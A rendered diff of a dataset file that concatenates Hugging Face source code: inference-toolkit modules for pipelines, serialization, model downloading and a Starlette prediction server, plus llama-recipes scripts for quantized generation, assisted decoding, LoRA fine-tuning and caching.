161
+ input_shapes_available = True
162
+ logger.info(f"Input shapes found in config file. Using input shapes from config with batch size {input_shapes['batch_size']} and sequence length {input_shapes['sequence_length']}")
163
+ else:
164
+ if os.environ.get('HF_OPTIMUM_BATCH_SIZE', None) is not None:
165
+ logger.warning('HF_OPTIMUM_BATCH_SIZE environment variable is set. Environment variable will be ignored and input shapes from config file will be used.')
166
+ if os.environ.get('HF_OPTIMUM_SEQUENCE_LENGTH', None) is not None:
167
+ logger.warning('HF_OPTIMUM_SEQUENCE_LENGTH environment variable is set. Environment variable will be ignored and input shapes from config file will be used.')
168
+ except Exception:
169
+ input_shapes_available = False
170
+ if input_shapes_available:
171
+ return input_shapes
172
+ sequence_length = os.environ.get('HF_OPTIMUM_SEQUENCE_LENGTH', None)
173
+ if sequence_length is None:
174
+ raise ValueError('HF_OPTIMUM_SEQUENCE_LENGTH environment variable is not set. Please set HF_OPTIMUM_SEQUENCE_LENGTH to a positive integer.')
175
+ if not int(sequence_length) > 0:
176
+ raise ValueError(f'HF_OPTIMUM_SEQUENCE_LENGTH must be set to a positive integer. Current value is {sequence_length}')
177
+ batch_size = os.environ.get('HF_OPTIMUM_BATCH_SIZE', 1)
178
+ logger.info(f'Using input shapes from environment variables with batch size {batch_size} and sequence length {sequence_length}')
179
+ return {'batch_size': int(batch_size), 'sequence_length': int(sequence_length)}
180
+
181
+ def get_optimum_neuron_pipeline(task, model_dir):
182
+ logger.info('Getting optimum neuron pipeline.')
183
+ from optimum.neuron.pipelines.transformers.base import NEURONX_SUPPORTED_TASKS, pipeline
184
+ from optimum.neuron.utils import NEURON_FILE_NAME
185
+ if not isinstance(model_dir, str):
186
+ model_dir = str(model_dir)
187
+ if task == 'sentence-embeddings':
188
+ task = 'feature-extraction'
189
+ if task not in NEURONX_SUPPORTED_TASKS:
190
+ raise ValueError(f'Task {task} is not supported by optimum neuron and inf2. Supported tasks are: {list(NEURONX_SUPPORTED_TASKS.keys())}')
191
+ export = True
192
+ if NEURON_FILE_NAME in os.listdir(model_dir):
193
+ export = False
194
+ if export:
195
+ logger.info('Model is not converted. Checking if required environment variables are set and converting model.')
196
+ input_shapes = get_input_shapes(model_dir)
197
+ neuron_pipe = pipeline(task, model=model_dir, export=export, input_shapes=input_shapes)
198
+ return neuron_pipe
199
+
200
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/sentence_transformers_utils.py
201
+ import importlib.util
202
+ _sentence_transformers = importlib.util.find_spec('sentence_transformers') is not None
203
+
204
+ def is_sentence_transformers_available():
205
+ return _sentence_transformers
206
+ if is_sentence_transformers_available():
207
+ from sentence_transformers import CrossEncoder, SentenceTransformer, util
208
+
209
+ class SentenceSimilarityPipeline:
210
+
211
+ def __init__(self, model_dir: str, device: str=None, **kwargs):
212
+ self.model = SentenceTransformer(model_dir, device=device, **kwargs)
213
+
214
+ def __call__(self, inputs=None):
215
+ embeddings1 = self.model.encode(inputs['source_sentence'], convert_to_tensor=True)
216
+ embeddings2 = self.model.encode(inputs['sentences'], convert_to_tensor=True)
217
+ similarities = util.pytorch_cos_sim(embeddings1, embeddings2).tolist()[0]
218
+ return {'similarities': similarities}
219
+
220
+ class SentenceEmbeddingPipeline:
221
+
222
+ def __init__(self, model_dir: str, device: str=None, **kwargs):
223
+ self.model = SentenceTransformer(model_dir, device=device, **kwargs)
224
+
225
+ def __call__(self, inputs):
226
+ embeddings = self.model.encode(inputs).tolist()
227
+ return {'embeddings': embeddings}
228
+
229
+ class RankingPipeline:
230
+
231
+ def __init__(self, model_dir: str, device: str=None, **kwargs):
232
+ self.model = CrossEncoder(model_dir, device=device, **kwargs)
233
+
234
+ def __call__(self, inputs):
235
+ scores = self.model.predict(inputs).tolist()
236
+ return {'scores': scores}
237
+ SENTENCE_TRANSFORMERS_TASKS = {'sentence-similarity': SentenceSimilarityPipeline, 'sentence-embeddings': SentenceEmbeddingPipeline, 'sentence-ranking': RankingPipeline}
238
+
239
+ def get_sentence_transformers_pipeline(task=None, model_dir=None, device=-1, **kwargs):
240
+ device = 'cuda' if device == 0 else 'cpu'
241
+ kwargs.pop('tokenizer', None)
242
+ kwargs.pop('framework', None)
243
+ if task not in SENTENCE_TRANSFORMERS_TASKS:
244
+ raise ValueError(f"Unknown task {task}. Available tasks are: {', '.join(SENTENCE_TRANSFORMERS_TASKS.keys())}")
245
+ return SENTENCE_TRANSFORMERS_TASKS[task](model_dir=model_dir, device=device, **kwargs)
246
+
247
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/serialization/base.py
248
+ from huggingface_inference_toolkit.serialization.audio_utils import Audioer
249
+ from huggingface_inference_toolkit.serialization.image_utils import Imager
250
+ from huggingface_inference_toolkit.serialization.json_utils import Jsoner
251
+ content_type_mapping = {'application/json': Jsoner, 'application/json; charset=UTF-8': Jsoner, 'text/csv': None, 'text/plain': None, 'image/png': Imager, 'image/jpeg': Imager, 'image/jpg': Imager, 'image/tiff': Imager, 'image/bmp': Imager, 'image/gif': Imager, 'image/webp': Imager, 'image/x-image': Imager, 'audio/x-flac': Audioer, 'audio/flac': Audioer, 'audio/mpeg': Audioer, 'audio/x-mpeg-3': Audioer, 'audio/wave': Audioer, 'audio/wav': Audioer, 'audio/x-wav': Audioer, 'audio/ogg': Audioer, 'audio/x-audio': Audioer, 'audio/webm': Audioer, 'audio/webm;codecs=opus': Audioer, 'audio/AMR': Audioer, 'audio/amr': Audioer, 'audio/AMR-WB': Audioer, 'audio/AMR-WB+': Audioer, 'audio/m4a': Audioer, 'audio/x-m4a': Audioer}
252
+
253
+ class ContentType:
254
+
255
+ @staticmethod
256
+ def get_deserializer(content_type):
257
+ if content_type in content_type_mapping:
258
+ return content_type_mapping[content_type]
259
+ else:
260
+ message = f'''\n Content type "{content_type}" not supported.\n Supported content types are:\n {', '.join(list(content_type_mapping.keys()))}\n '''
261
+ raise Exception(message)
262
+
263
+ @staticmethod
264
+ def get_serializer(accept):
265
+ if accept in content_type_mapping:
266
+ return content_type_mapping[accept]
267
+ else:
268
+ message = f'''\n Accept type "{accept}" not supported.\n Supported accept types are:\n {', '.join(list(content_type_mapping.keys()))}\n '''
269
+ raise Exception(message)
270
+
271
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/serialization/image_utils.py
272
+ from io import BytesIO
273
+ from PIL import Image
274
+
275
+ class Imager:
276
+
277
+ @staticmethod
278
+ def deserialize(body):
279
+ image = Image.open(BytesIO(body)).convert('RGB')
280
+ return {'inputs': image}
281
+
282
+ @staticmethod
283
+ def serialize(image, accept=None):
284
+ if isinstance(image, Image.Image):
285
+ img_byte_arr = BytesIO()
286
+ image.save(img_byte_arr, format=accept.split('/')[-1].upper())
287
+ img_byte_arr = img_byte_arr.getvalue()
288
+ return img_byte_arr
289
+ else:
290
+ raise ValueError(f'Can only serialize PIL.Image.Image, got {type(image)}')
291
+
292
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/serialization/json_utils.py
293
+ import base64
294
+ from io import BytesIO
295
+ import orjson
296
+ from PIL import Image
297
+
298
+ def default(obj):
299
+ if isinstance(obj, Image.Image):
300
+ with BytesIO() as out:
301
+ obj.save(out, format='PNG')
302
+ png_string = out.getvalue()
303
+ return base64.b64encode(png_string).decode('utf-8')
304
+ raise TypeError
305
+
306
+ class Jsoner:
307
+
308
+ @staticmethod
309
+ def deserialize(body):
310
+ return orjson.loads(body)
311
+
312
+ @staticmethod
313
+ def serialize(body, accept=None):
314
+ return orjson.dumps(body, option=orjson.OPT_SERIALIZE_NUMPY, default=default)
315
+
316
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/utils.py
317
+ import importlib.util
318
+ import sys
319
+ from pathlib import Path
320
+ from typing import Optional, Union
321
+ from huggingface_hub import HfApi, login, snapshot_download
322
+ from transformers import WhisperForConditionalGeneration, pipeline
323
+ from transformers.file_utils import is_tf_available, is_torch_available
324
+ from transformers.pipelines import Pipeline
325
+ from huggingface_inference_toolkit.const import HF_DEFAULT_PIPELINE_NAME, HF_MODULE_NAME
326
+ from huggingface_inference_toolkit.diffusers_utils import get_diffusers_pipeline, is_diffusers_available
327
+ from huggingface_inference_toolkit.logging import logger
328
+ from huggingface_inference_toolkit.optimum_utils import get_optimum_neuron_pipeline, is_optimum_neuron_available
329
+ from huggingface_inference_toolkit.sentence_transformers_utils import get_sentence_transformers_pipeline, is_sentence_transformers_available
330
+ if is_tf_available():
331
+ import tensorflow as tf
332
+ if is_torch_available():
333
+ import torch
334
+ _optimum_available = importlib.util.find_spec('optimum') is not None
335
+
336
+ def is_optimum_available():
337
+ return False
338
+ framework2weight = {'pytorch': 'pytorch*', 'tensorflow': 'tf*', 'tf': 'tf*', 'pt': 'pytorch*', 'flax': 'flax*', 'rust': 'rust*', 'onnx': '*onnx*', 'safetensors': '*safetensors', 'coreml': '*mlmodel', 'tflite': '*tflite', 'savedmodel': '*tar.gz', 'openvino': '*openvino*', 'ckpt': '*ckpt'}
339
+
340
+ def create_artifact_filter(framework):
341
+ ignore_regex_list = list(set(framework2weight.values()))
342
+ pattern = framework2weight.get(framework, None)
343
+ if pattern in ignore_regex_list:
344
+ ignore_regex_list.remove(pattern)
345
+ return ignore_regex_list
346
+ else:
347
+ return []
348
+
349
+ def _is_gpu_available():
350
+ if is_tf_available():
351
+ return True if len(tf.config.list_physical_devices('GPU')) > 0 else False
352
+ elif is_torch_available():
353
+ return torch.cuda.is_available()
354
+ else:
355
+ raise RuntimeError('At least one of TensorFlow 2.0 or PyTorch should be installed. To install TensorFlow 2.0, read the instructions at https://www.tensorflow.org/install/ To install PyTorch, read the instructions at https://pytorch.org/.')
356
+
357
+ def _get_framework():
358
+ if is_torch_available():
359
+ return 'pytorch'
360
+ elif is_tf_available():
361
+ return 'tensorflow'
362
+ else:
363
+ raise RuntimeError('At least one of TensorFlow 2.0 or PyTorch should be installed. To install TensorFlow 2.0, read the instructions at https://www.tensorflow.org/install/ To install PyTorch, read the instructions at https://pytorch.org/.')
364
+
365
+ def _load_repository_from_hf(repository_id: Optional[str]=None, target_dir: Optional[Union[str, Path]]=None, framework: Optional[str]=None, revision: Optional[str]=None, hf_hub_token: Optional[str]=None):
366
+ if hf_hub_token is not None:
367
+ login(token=hf_hub_token)
368
+ if framework is None:
369
+ framework = _get_framework()
370
+ if isinstance(target_dir, str):
371
+ target_dir = Path(target_dir)
372
+ if not target_dir.exists():
373
+ target_dir.mkdir(parents=True)
374
+ if framework == 'pytorch':
375
+ files = HfApi().model_info(repository_id).siblings
376
+ if any((f.rfilename.endswith('safetensors') for f in files)):
377
+ framework = 'safetensors'
378
+ ignore_regex = create_artifact_filter(framework)
379
+ logger.info(f"Ignore regex pattern for files, which are not downloaded: {', '.join(ignore_regex)}")
380
+ snapshot_download(repo_id=repository_id, revision=revision, local_dir=str(target_dir), local_dir_use_symlinks=False, ignore_patterns=ignore_regex)
381
+ return target_dir
382
+
383
+ def check_and_register_custom_pipeline_from_directory(model_dir):
384
+ custom_module = Path(model_dir).joinpath(HF_DEFAULT_PIPELINE_NAME)
385
+ legacy_module = Path(model_dir).joinpath('pipeline.py')
386
+ if custom_module.is_file():
387
+ logger.info(f'Found custom pipeline at {custom_module}')
388
+ spec = importlib.util.spec_from_file_location(HF_MODULE_NAME, custom_module)
389
+ if spec:
390
+ sys.path.insert(0, model_dir)
391
+ handler = importlib.util.module_from_spec(spec)
392
+ sys.modules[HF_MODULE_NAME] = handler
393
+ spec.loader.exec_module(handler)
394
+ custom_pipeline = handler.EndpointHandler(model_dir)
395
+ elif legacy_module.is_file():
396
+ logger.warning('You are using a legacy custom pipeline.\n Please update to the new format.\n See documentation for more information.')
397
+ spec = importlib.util.spec_from_file_location('pipeline.PreTrainedPipeline', legacy_module)
398
+ if spec:
399
+ sys.path.insert(0, model_dir)
400
+ pipeline = importlib.util.module_from_spec(spec)
401
+ sys.modules['pipeline.PreTrainedPipeline'] = pipeline
402
+ spec.loader.exec_module(pipeline)
403
+ custom_pipeline = pipeline.PreTrainedPipeline(model_dir)
404
+ else:
405
+ logger.info(f'No custom pipeline found at {custom_module}')
406
+ custom_pipeline = None
407
+ return custom_pipeline
408
+
409
+ def get_device():
410
+ gpu = _is_gpu_available()
411
+ if gpu:
412
+ return 0
413
+ else:
414
+ return -1
415
+
416
+ def get_pipeline(task: str, model_dir: Path, **kwargs) -> Pipeline:
417
+ device = get_device()
418
+ if is_optimum_neuron_available():
419
+ logger.info('Using device Neuron')
420
+ else:
421
+ logger.info(f"Using device {('GPU' if device == 0 else 'CPU')}")
422
+ if task is None:
423
+ raise EnvironmentError('The task for this model is not set: Please set one: https://huggingface.co/docs#how-is-a-models-type-of-inference-api-and-widget-determined')
424
+ if task in {'automatic-speech-recognition', 'image-segmentation', 'image-classification', 'audio-classification', 'object-detection', 'zero-shot-image-classification'}:
425
+ kwargs['feature_extractor'] = model_dir
426
+ elif task in {'image-to-text', 'text-to-image'}:
427
+ pass
428
+ elif task == 'conversational':
429
+ task = 'text-generation'
430
+ else:
431
+ kwargs['tokenizer'] = model_dir
432
+ if is_optimum_neuron_available():
433
+ hf_pipeline = get_optimum_neuron_pipeline(task=task, model_dir=model_dir)
434
+ elif is_sentence_transformers_available() and task in ['sentence-similarity', 'sentence-embeddings', 'sentence-ranking']:
435
+ hf_pipeline = get_sentence_transformers_pipeline(task=task, model_dir=model_dir, device=device, **kwargs)
436
+ elif is_diffusers_available() and task == 'text-to-image':
437
+ hf_pipeline = get_diffusers_pipeline(task=task, model_dir=model_dir, device=device, **kwargs)
438
+ else:
439
+ hf_pipeline = pipeline(task=task, model=model_dir, device=device, **kwargs)
440
+ if task == 'automatic-speech-recognition' and isinstance(hf_pipeline.model, WhisperForConditionalGeneration):
441
+ hf_pipeline._preprocess_params['chunk_length_s'] = 30
442
+ hf_pipeline.model.config.forced_decoder_ids = hf_pipeline.tokenizer.get_decoder_prompt_ids(language='english', task='transcribe')
443
+ return hf_pipeline
444
+
445
+ def convert_params_to_int_or_bool(params):
446
+ for (k, v) in params.items():
447
+ if v.isnumeric():
448
+ params[k] = int(v)
449
+ if v == 'false':
450
+ params[k] = False
451
+ if v == 'true':
452
+ params[k] = True
453
+ return params
454
+
455
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/vertex_ai_utils.py
456
+ import re
457
+ from pathlib import Path
458
+ from typing import Union
459
+ from huggingface_inference_toolkit.logging import logger
460
+ GCS_URI_PREFIX = 'gs://'
461
+
462
+ def _load_repository_from_gcs(artifact_uri: str, target_dir: Union[str, Path]='/tmp') -> str:
463
+ from google.cloud import storage
464
+ logger.info(f'Loading model artifacts from {artifact_uri} to {target_dir}')
465
+ if isinstance(target_dir, str):
466
+ target_dir = Path(target_dir)
467
+ if artifact_uri.startswith(GCS_URI_PREFIX):
468
+ matches = re.match(f'{GCS_URI_PREFIX}(.*?)/(.*)', artifact_uri)
469
+ (bucket_name, prefix) = matches.groups()
470
+ gcs_client = storage.Client()
471
+ blobs = gcs_client.list_blobs(bucket_name, prefix=prefix)
472
+ for blob in blobs:
473
+ name_without_prefix = blob.name[len(prefix):]
474
+ name_without_prefix = name_without_prefix[1:] if name_without_prefix.startswith('/') else name_without_prefix
475
+ file_split = name_without_prefix.split('/')
476
+ directory = target_dir / Path(*file_split[0:-1])
477
+ directory.mkdir(parents=True, exist_ok=True)
478
+ if name_without_prefix and (not name_without_prefix.endswith('/')):
479
+ blob.download_to_filename(target_dir / name_without_prefix)
480
+ return str(target_dir.absolute())
481
+
482
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/webservice_starlette.py
483
+ import os
484
+ from pathlib import Path
485
+ from time import perf_counter
486
+ import orjson
487
+ from starlette.applications import Starlette
488
+ from starlette.responses import PlainTextResponse, Response
489
+ from starlette.routing import Route
490
+ from huggingface_inference_toolkit.async_utils import async_handler_call
491
+ from huggingface_inference_toolkit.const import HF_FRAMEWORK, HF_HUB_TOKEN, HF_MODEL_DIR, HF_MODEL_ID, HF_REVISION, HF_TASK
492
+ from huggingface_inference_toolkit.handler import get_inference_handler_either_custom_or_default_handler
493
+ from huggingface_inference_toolkit.logging import logger
494
+ from huggingface_inference_toolkit.serialization.base import ContentType
495
+ from huggingface_inference_toolkit.serialization.json_utils import Jsoner
496
+ from huggingface_inference_toolkit.utils import _load_repository_from_hf, convert_params_to_int_or_bool
497
+ from huggingface_inference_toolkit.vertex_ai_utils import _load_repository_from_gcs
498
+
499
+ async def prepare_model_artifacts():
500
+ global inference_handler
501
+ if len(list(Path(HF_MODEL_DIR).glob('**/*'))) <= 0:
502
+ if HF_MODEL_ID is not None:
503
+ _load_repository_from_hf(repository_id=HF_MODEL_ID, target_dir=HF_MODEL_DIR, framework=HF_FRAMEWORK, revision=HF_REVISION, hf_hub_token=HF_HUB_TOKEN)
504
+ elif len(os.environ.get('AIP_STORAGE_URI', '')) > 0:
505
+ _load_repository_from_gcs(os.environ['AIP_STORAGE_URI'], target_dir=HF_MODEL_DIR)
506
+ else:
507
+ raise ValueError(f"Can't initialize model.\n Please set env HF_MODEL_DIR or provider a HF_MODEL_ID.\n Provided values are:\n HF_MODEL_DIR: {HF_MODEL_DIR} and HF_MODEL_ID:{HF_MODEL_ID}")
508
+ logger.info(f'Initializing model from directory:{HF_MODEL_DIR}')
509
+ inference_handler = get_inference_handler_either_custom_or_default_handler(HF_MODEL_DIR, task=HF_TASK)
510
+ logger.info('Model initialized successfully')
511
+
512
+ async def health(request):
513
+ return PlainTextResponse('Ok')
514
+
515
+ async def predict(request):
516
+ try:
517
+ content_type = request.headers.get('content-Type', None)
518
+ deserialized_body = ContentType.get_deserializer(content_type).deserialize(await request.body())
519
+ if 'inputs' not in deserialized_body and 'instances' not in deserialized_body:
520
+ raise ValueError(f'Body needs to provide a inputs key, received: {orjson.dumps(deserialized_body)}')
521
+ if request.query_params and 'parameters' not in deserialized_body:
522
+ deserialized_body['parameters'] = convert_params_to_int_or_bool(dict(request.query_params))
523
+ start_time = perf_counter()
524
+ pred = await async_handler_call(inference_handler, deserialized_body)
525
+ logger.info(f'POST {request.url.path} | Duration: {(perf_counter() - start_time) * 1000:.2f} ms')
526
+ accept = request.headers.get('accept', None)
527
+ if accept is None or accept == '*/*':
528
+ accept = 'application/json'
529
+ serialized_response_body = ContentType.get_serializer(accept).serialize(pred, accept)
530
+ return Response(serialized_response_body, media_type=accept)
531
+ except Exception as e:
532
+ logger.error(e)
533
+ return Response(Jsoner.serialize({'error': str(e)}), status_code=400, media_type='application/json')
534
+ if os.getenv('AIP_MODE', None) == 'PREDICTION':
535
+ logger.info('Running in Vertex AI environment')
536
+ _predict_route = os.getenv('AIP_PREDICT_ROUTE', None)
537
+ _health_route = os.getenv('AIP_HEALTH_ROUTE', None)
538
+ if _predict_route is None or _health_route is None:
539
+ raise ValueError('AIP_PREDICT_ROUTE and AIP_HEALTH_ROUTE need to be set in Vertex AI environment')
540
+ app = Starlette(debug=False, routes=[Route(_health_route, health, methods=['GET']), Route(_predict_route, predict, methods=['POST'])], on_startup=[prepare_model_artifacts])
541
+ else:
542
+ app = Starlette(debug=False, routes=[Route('/', health, methods=['GET']), Route('/health', health, methods=['GET']), Route('/', predict, methods=['POST']), Route('/predict', predict, methods=['POST'])], on_startup=[prepare_model_artifacts])
543
+
huggingface_huggingface-llama-recipes.txt ADDED
@@ -0,0 +1,141 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: huggingface-llama-recipes-main/assisted_decoding.py
2
+ from transformers import AutoModelForCausalLM, AutoTokenizer
3
+ import time
4
+ import torch
5
+ WARMUP = 2
6
+ MAX_NEW_TOKENS = 10
7
+ DO_SAMPLE = True
8
+ ATOL = 1e-06
9
+ TORCH_DTYPE = torch.float32
10
+ PROMPT = 'Alice and Bob '
11
+ CHECKPOINT = 'meta-llama/Meta-Llama-3-405B'
12
+ ASSISTED_CHECKPOINT = 'meta-llama/Meta-Llama-3.1-8B'
13
+ model = AutoModelForCausalLM.from_pretrained(CHECKPOINT, device_map='auto', torch_dtype=TORCH_DTYPE)
14
+ assistant_model = AutoModelForCausalLM.from_pretrained(ASSISTED_CHECKPOINT, device_map='auto', torch_dtype=TORCH_DTYPE)
15
+ tokenizer = AutoTokenizer.from_pretrained(CHECKPOINT)
16
+ inputs = tokenizer(PROMPT, return_tensors='pt').to(model.device)
17
+ for _ in range(WARMUP):
18
+ model.generate(**inputs, assistant_model=assistant_model)
19
+ start = time.time()
20
+ assisted_outputs = model.generate(**inputs, assistant_model=assistant_model)
21
+ end = time.time()
22
+ assisted_gen_text = tokenizer.batch_decode(assisted_outputs, skip_special_tokens=True)
23
+ print(assisted_gen_text)
24
+ print(f'\nAssisted time taken: {end - start:.2f}s')
25
+
26
+ # File: huggingface-llama-recipes-main/awq_generation.py
27
+ import torch
28
+ from transformers import AutoModelForCausalLM, AutoTokenizer, AwqConfig
29
+ model_id = 'hugging-quants/Meta-Llama-3.1-405B-Instruct-AWQ-INT4'
30
+ quantization_config = AwqConfig(bits=4, fuse_max_seq_len=512, do_fuse=True)
31
+ tokenizer = AutoTokenizer.from_pretrained(model_id)
32
+ model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, low_cpu_mem_usage=True, device_map='auto', quantization_config=quantization_config)
33
+ messages = [{'role': 'system', 'content': 'You are a pirate'}, {'role': 'user', 'content': "What's Deep Leaning?"}]
34
+ inputs = tokenizer.apply_chat_template(messages, tokenize=True, add_generation_prompt=True, return_tensors='pt', return_dict=True).to('cuda')
35
+ outputs = model.generate(**inputs, do_sample=True, max_new_tokens=256)
36
+ print(tokenizer.batch_decode(outputs, skip_special_tokens=True))
37
+
38
+ # File: huggingface-llama-recipes-main/gptq_generation.py
39
+ import torch
40
+ from transformers import AutoModelForCausalLM, AutoTokenizer
41
+ model_id = 'hugging-quants/Meta-Llama-3.1-405B-Instruct-GPTQ-INT4'
42
+ messages = [{'role': 'system', 'content': 'You are a pirate'}, {'role': 'user', 'content': "What's Deep Leaning?"}]
43
+ tokenizer = AutoTokenizer.from_pretrained(model_id)
44
+ model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, low_cpu_mem_usage=True, device_map='auto')
45
+ inputs = tokenizer.apply_chat_template(messages, tokenize=True, add_generation_prompt=True, return_tensors='pt', return_dict=True).to('cuda')
46
+ outputs = model.generate(**inputs, do_sample=True, max_new_tokens=256)
47
+ print(tokenizer.batch_decode(outputs, skip_special_tokens=True))
48
+
49
+ # File: huggingface-llama-recipes-main/peft_finetuning.py
50
+ import torch
51
+ from datasets import load_dataset
52
+ from trl import SFTTrainer
53
+ from peft import LoraConfig
54
+ from transformers import AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig, TrainingArguments
55
+ model_id = 'meta-llama/Meta-Llama-3.1-8B'
56
+ tokenizer = AutoTokenizer.from_pretrained(model_id)
57
+ model = AutoModelForCausalLM.from_pretrained(model_id)
58
+ dataset = load_dataset('imdb', split='train')
59
+ training_args = TrainingArguments(output_dir='./results', num_train_epochs=3, per_device_train_batch_size=4, logging_dir='./logs', logging_steps=10)
60
+ QLoRA = True
61
+ if QLoRA:
62
+ quantization_config = BitsAndBytesConfig(load_in_4bit=True, bnb_4bit_compute_dtype=torch.float16, bnb_4bit_quant_type='nf4')
63
+ lora_config = LoraConfig(r=8, target_modules='all-linear', bias='none', task_type='CAUSAL_LM')
64
+ else:
65
+ lora_config = None
66
+ trainer = SFTTrainer(model=model, tokenizer=tokenizer, args=training_args, peft_config=lora_config, train_dataset=dataset, dataset_text_field='text')
67
+ trainer.train()
68
+
69
+ # File: huggingface-llama-recipes-main/prompt_reuse.py
70
+ import os, torch, copy
71
+ from transformers import AutoModelForCausalLM, AutoTokenizer, DynamicCache
72
+ device = 'cuda'
73
+ ckpt = 'meta-llama/Meta-Llama-3.1-8B-Instruct'
74
+ INITIAL_PROMPT = 'From now on, you are going to answer all my questions with historical details. Make sure to always add a bit of french here and there, for style.'
75
+ model = AutoModelForCausalLM.from_pretrained(ckpt, torch_dtype=torch.float16)
76
+ model.to(device)
77
+ tokenizer = AutoTokenizer.from_pretrained(ckpt)
78
+ prompt_cache = DynamicCache()
79
+ inputs = tokenizer(INITIAL_PROMPT, return_tensors='pt').to('cuda')
80
+ prompt_cache = model(**inputs, past_key_values=prompt_cache).past_key_values
81
+ prompt = 'Why are french people obsessed with french?'
82
+ new_inputs = tokenizer(INITIAL_PROMPT + prompt, return_tensors='pt').to('cuda')
83
+ past_key_values = copy.deepcopy(prompt_cache)
84
+ outputs = model.generate(**new_inputs, past_key_values=past_key_values, max_new_tokens=20)
85
+ response = tokenizer.batch_decode(outputs)[0]
86
+ print(response)
87
+ ''
88
+ prompt = 'What is the best city to swim in?'
89
+ new_inputs = tokenizer(INITIAL_PROMPT + prompt, return_tensors='pt').to('cuda')
90
+ outputs = model.generate(**new_inputs, past_key_values=copy.deepcopy(prompt_cache), max_new_tokens=20)
91
+ response = tokenizer.batch_decode(outputs)[0]
92
+ print(response)
93
+ ''
94
+
95
+ # File: huggingface-llama-recipes-main/quantized_cache.py
96
+ import os
97
+ import torch
98
+ from transformers import AutoModelForCausalLM, AutoTokenizer
99
+ device = 'cuda'
100
+ ckpt = 'meta-llama/Meta-Llama-3.1-8B-Instruct'
101
+ model = AutoModelForCausalLM.from_pretrained(ckpt, torch_dtype=torch.float16)
102
+ model.to(device)
103
+ tokenizer = AutoTokenizer.from_pretrained(ckpt)
104
+ prompt = 'Explain the thre body problem'
105
+ inputs = tokenizer(prompt, return_tensors='pt').to('cuda')
106
+ outputs = model.generate(**inputs, cache_implementation='quantized', do_sample=True, max_new_tokens=256)
107
+ response = tokenizer.batch_decode(outputs)[0]
108
+ print(response)
109
+ ''
110
+ from transformers import QuantizedCacheConfig
111
+ cache_config = QuantizedCacheConfig(backend='HQQ', nbits=4, axis_key=0, axis_value=1, compute_dtype=torch.float16, device=model.device)
112
+ out = model.generate(**inputs, do_sample=False, max_new_tokens=30, cache_implementation='quantized', cache_config=cache_config)
113
+ print(tokenizer.batch_decode(out, skip_special_tokens=True))
114
+ ''
115
+
116
+ # File: huggingface-llama-recipes-main/torch_compile.py
117
+ import os
118
+ import torch
119
+ from transformers import AutoModelForCausalLM, AutoTokenizer
120
+ os.environ['TOKENIZERS_PARALLELISM'] = 'false'
121
+ device = 'cuda'
122
+ ckpt = 'meta-llama/Meta-Llama-3.1-8B-Instruct'
123
+ model = AutoModelForCausalLM.from_pretrained(ckpt, torch_dtype=torch.float16)
124
+ model.to(device)
125
+ tokenizer = AutoTokenizer.from_pretrained(ckpt)
126
+ prompt = 'Why dogs are so cute?'
127
+ inputs = tokenizer(prompt, return_tensors='pt').to(device)
128
+ model.generation_config.max_length = 128
129
+ outputs = model.generate(**inputs, do_sample=False)
130
+ response = tokenizer.batch_decode(outputs)[0]
131
+ print(response)
132
+ model.forward = torch.compile(model.forward, mode='reduce-overhead', fullgraph=True)
133
+ model.generation_config.cache_implementation = 'static'
134
+ outputs = model.generate(**inputs, do_sample=False)
135
+ response = tokenizer.batch_decode(outputs)[0]
136
+ outputs = model.generate(**inputs, do_sample=False)
137
+ response = tokenizer.batch_decode(outputs)[0]
138
+ outputs = model.generate(**inputs, do_sample=False)
139
+ response = tokenizer.batch_decode(outputs)[0]
140
+ print(response)
141
+
huggingface_huggingface_hub.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_lerobot.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_lm-evaluation-harness.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_notebooks.txt ADDED
@@ -0,0 +1,1057 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
